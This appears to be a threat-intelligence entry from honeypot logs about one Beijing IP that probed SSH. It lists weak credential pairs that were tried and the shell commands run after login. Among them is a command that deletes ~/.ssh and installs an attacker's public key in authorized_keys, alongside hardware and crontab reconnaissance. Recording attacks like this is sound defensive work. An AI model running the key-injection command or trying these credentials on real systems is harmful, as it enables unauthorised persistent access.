Active Threat โ€ข HIGH

120.48.15.138

First Detection1/21/2026
Last Activity2/21/2026
ISPBeijing Baidu Netcom Science and Technology Co., Ltd.
๐ŸŽฏ
193
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
18
Malware

Geolocation

Country
๐Ÿ‡จ๐Ÿ‡ณ China
City
Beijing
ASN
AS38365
ISP
Beijing Baidu Netcom Science and Technology Co., Ltd.

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

๐Ÿ”testuser/testpass
1x
๐Ÿ”root/Aaa123123
1x
๐Ÿ”root/musa
1x
๐Ÿ”user2/123456
1x
๐Ÿ”ubuntu/ubuntu22
1x
๐Ÿ”proxyuser/1234567
1x
๐Ÿ”root/asdasd
1x
๐Ÿ”edu/edu
1x
๐Ÿ”postgres/123456789
1x

Executed Commands

$ls -lh $(which ls)1x
$whoami1x
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~1x
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'1x
$lscpu | grep Model1x
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'1x
$cat /proc/cpuinfo | grep name | wc -l1x
$crontab -l1x
$cat /proc/cpuinfo | grep model | grep name | wc -l1x
$which ls1x

Risk Assessment

65
/100
LowMediumHighCritical